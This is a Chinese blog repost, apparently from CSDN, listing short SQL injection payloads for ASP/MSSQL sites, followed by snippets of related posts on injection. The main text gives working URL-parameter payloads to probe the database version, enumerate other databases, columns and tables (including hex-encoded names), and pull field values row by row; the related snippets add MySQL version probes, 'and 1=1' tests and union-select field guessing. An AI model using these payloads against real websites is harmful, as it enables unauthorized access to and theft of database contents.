注入的几条简单语句

转载 2006年06月08日 14:53:00
一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名

SQL注入的一个简单实例

很多Web应用程序都使用数据库来存储信息。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递至Web应用程序。很多Web站点都会利用用户输入的参数动态地生成SQL查询要求,攻击者通过在U...
  • u012436758
  • u012436758
  • 2016年12月25日 18:27
  • 1572

MYSQL注入语句

and ord(mid(version(),1,1))>51 解释1: 确认数据库版本 51是ASCII码3 正确则>4.0 错误则解释2:ord()是mysql的函数用于获取二进制码;解释3:m...
  • boer521314
  • boer521314
  • 2015年08月24日 08:47
  • 1040

SQL注入语句大全

1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 0 3.猜帐号...
  • zzq19860626
  • zzq19860626
  • 2013年08月23日 13:55
  • 21599

各种数据库查询前几条数据的方法

1. ORACLE SELECT * FROM TABLE1 WHERE ROWNUM
  • qhwc2009
  • qhwc2009
  • 2015年05月05日 09:27
  • 452

常见的SQL注入检测语句

0x00 前言
  • qq_29277155
  • qq_29277155
  • 2016年04月26日 12:40
  • 8359

实验吧web之简单的sql注入1

0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced...
  • Everywhere_wwx
  • Everywhere_wwx
  • 2017年05月06日 19:56
  • 2683

怎样写防止Sql注入的Sql语句

1.什么是SQL注入     所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 2.如何防止SQL注入 防止SQL...
  • xuanwuziyou
  • xuanwuziyou
  • 2015年01月12日 14:11
  • 2280

sql注入漏洞的一种实例

在做毕业设计的时候,竟然碰到了一中叫sql注入漏洞的现象。   当笔者用一条sql语句查询时,select * from users where username='zf' and passwd='z...
  • zhuofeng85
  • zhuofeng85
  • 2013年10月27日 22:50
  • 2196

MySQL 手工注入语句总结

sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union...
  • senlin1202
  • senlin1202
  • 2016年03月04日 09:56
  • 4106

SQL注入教程——(三)简单的注入尝试

本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重点理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP...
  • helloc0de
  • helloc0de
  • 2017年07月26日 13:20
  • 796
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:注入的几条简单语句
举报原因:
原因补充:

(最多只允许输入30个字)